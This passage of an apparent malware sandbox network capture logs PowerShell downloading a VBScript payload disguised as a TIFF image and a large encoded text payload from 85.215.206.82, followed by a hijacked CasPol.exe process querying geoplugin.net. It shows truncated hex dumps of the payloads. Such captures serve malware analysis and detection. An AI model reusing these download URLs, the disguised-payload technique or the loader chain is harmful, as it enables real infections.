                                                                                                                                                                        Oct 23, 2024 17:26:32.377178907 CEST848INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                        Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Oct 23, 2024 17:26:32.377193928 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                        Oct 23, 2024 17:26:32.377206087 CEST212INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                                                                                        Oct 23, 2024 17:26:32.377219915 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                        Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                        Oct 23, 2024 17:26:32.377232075 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                        Oct 23, 2024 17:26:32.377393007 CEST424INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252
                                                                                                                                                                        Oct 23, 2024 17:26:32.382630110 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.224917085.215.206.82803180C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 23, 2024 17:26:44.717466116 CEST356OUTGET /270/igetbestthingswithbestpicturewithgreatthingsonme.tIF HTTP/1.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                        Host: 85.215.206.82
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Oct 23, 2024 17:26:45.588454962 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:26:45 GMT
                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                        Last-Modified: Wed, 23 Oct 2024 07:25:42 GMT
                                                                                                                                                                        ETag: "22576-6251fcb2802ee"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 140662
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: image/tiff
                                                                                                                                                                        Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 61 00 76 00 69 00 6e 00 61 00 67 00 72 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 61 00 72 00 6e 00 69 00 73 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 61 00 72 00 6e 00 69 00 73 00 74 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 [TRUNCATED]
                                                                                                                                                                        Data Ascii: private function CreateSession(wsman, conStr, optDic, avinagrar) dim carnistaFlags dim conOpt dim carnista dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword carnistaFlags = 0 proxyAccessType
                                                                                                                                                                        Oct 23, 2024 17:26:45.588469982 CEST1236INData Raw: 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f
                                                                                                                                                                        Data Ascii: = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 prox
                                                                                                                                                                        Oct 23, 2024 17:26:45.588481903 CEST424INData Raw: 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 72 00 6e 00 69 00 73 00 74 00 61 00 46 00 6c 00 61 00 67 00 73
                                                                                                                                                                        Data Ascii: = "utf-8" then carnistaFlags = carnistaFlags OR wsman.SessionFlagUTF8 else ' Invalid!
                                                                                                                                                                        Oct 23, 2024 17:26:45.588493109 CEST1236INData Raw: 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73
                                                                                                                                                                        Data Ascii: end if if optDic.ArgumentExists(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOT
                                                                                                                                                                        Oct 23, 2024 17:26:45.588505030 CEST1236INData Raw: 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55 00 73 00 65 00 53 00 73 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66
                                                                                                                                                                        Data Ascii: SessionFlagUseSsl end if if optDic.ArgumentExists(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH)
                                                                                                                                                                        Oct 23, 2024 17:26:45.588535070 CEST424INData Raw: 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 29 00 2c 00 20
                                                                                                                                                                        Data Ascii: t optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is only valid for '-auth:none'"
                                                                                                                                                                        Oct 23, 2024 17:26:45.588552952 CEST1236INData Raw: 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29
                                                                                                                                                                        Data Ascii: OOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'"
                                                                                                                                                                        Oct 23, 2024 17:26:45.588566065 CEST1236INData Raw: 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22 00 54 00 68
                                                                                                                                                                        Data Ascii: ot optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'"
                                                                                                                                                                        Oct 23, 2024 17:26:45.588577986 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67
                                                                                                                                                                        Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-au
                                                                                                                                                                        Oct 23, 2024 17:26:45.588589907 CEST1236INData Raw: 00 74 00 68 00 3a 00 63 00 65 00 72 00 74 00 69 00 66 00 69 00 63 00 61 00 74 00 65 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42
                                                                                                                                                                        Data Ascii: th:certificate'" ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' op
                                                                                                                                                                        Oct 23, 2024 17:26:45.594075918 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73
                                                                                                                                                                        Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:credss


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.224917385.215.206.82802924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 23, 2024 17:27:15.684478998 CEST78OUTGET /270/WRFFDCE.txt HTTP/1.1
                                                                                                                                                                        Host: 85.215.206.82
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Oct 23, 2024 17:27:16.568993092 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Wed, 23 Oct 2024 15:27:16 GMT
                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                        Last-Modified: Wed, 23 Oct 2024 07:23:30 GMT
                                                                                                                                                                        ETag: "a1000-6251fc3464fdf"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Content-Length: 659456
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                        Oct 23, 2024 17:27:16.569022894 CEST212INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                        Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNU
                                                                                                                                                                        Oct 23, 2024 17:27:16.569034100 CEST1236INData Raw: 57 44 68 31 41 59 4e 77 56 44 57 31 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44
                                                                                                                                                                        Data Ascii: WDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr
                                                                                                                                                                        Oct 23, 2024 17:27:16.569386959 CEST1236INData Raw: 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50
                                                                                                                                                                        Data Ascii: QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxN
                                                                                                                                                                        Oct 23, 2024 17:27:16.569408894 CEST1236INData Raw: 71 44 6a 36 67 6f 4f 45 71 44 67 36 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44
                                                                                                                                                                        Data Ascii: qDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq
                                                                                                                                                                        Oct 23, 2024 17:27:16.569422007 CEST1236INData Raw: 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54
                                                                                                                                                                        Data Ascii: QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6M
                                                                                                                                                                        Oct 23, 2024 17:27:16.569432974 CEST1236INData Raw: 41 48 41 41 41 77 50 2f 2f 6a 34 2f 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a
                                                                                                                                                                        Data Ascii: AHAAAwP//j4/o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh
                                                                                                                                                                        Oct 23, 2024 17:27:16.569447994 CEST1060INData Raw: 55 33 4f 73 74 7a 59 37 30 30 4f 42 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a
                                                                                                                                                                        Data Ascii: U3OstzY700OBtzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvO
                                                                                                                                                                        Oct 23, 2024 17:27:16.569458961 CEST1236INData Raw: 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42 4f 43 63 54 2f 33 67 2f 4e 74 66 54 30 33 63 38 4e 73 65 7a 70 33 49 36 4e 58 65 44 5a 33 41 30 4e 37 63 6a
                                                                                                                                                                        Data Ascii: kjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjH
                                                                                                                                                                        Oct 23, 2024 17:27:16.569469929 CEST1236INData Raw: 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a 43 77 30 4f 4d 33 41 7a 47 41 41 41 41 77 41 77 41 77 44 41 41 41 38 6a 77 2f 67 61 4f 70 6c 6a 42 34 51 4c
                                                                                                                                                                        Data Ascii: AwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM
                                                                                                                                                                        Oct 23, 2024 17:27:16.574902058 CEST1236INData Raw: 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45 41 44 41 47 41 41 41 77 50 2b 2f 44 2b 2f 49 2f 50 74 2f 7a 35 2f 45 2b 50 62 2f 6a 31 2f 41 39 50 4b 2f 44
                                                                                                                                                                        Data Ascii: BzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKPDyjb8gGPgxzS84DPywDJ78fONmjh5oXOihj6


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.2249176178.237.33.50803608C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Oct 23, 2024 17:27:22.412441969 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Oct 23, 2024 17:27:23.237325907 CEST1165INHTTP/1.1 200 OK
                                                                                                                                                                        date: Wed, 23 Oct 2024 15:27:23 GMT
                                                                                                                                                                        server: Apache
                                                                                                                                                                        content-length: 957
                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                        access-control-allow-origin: *
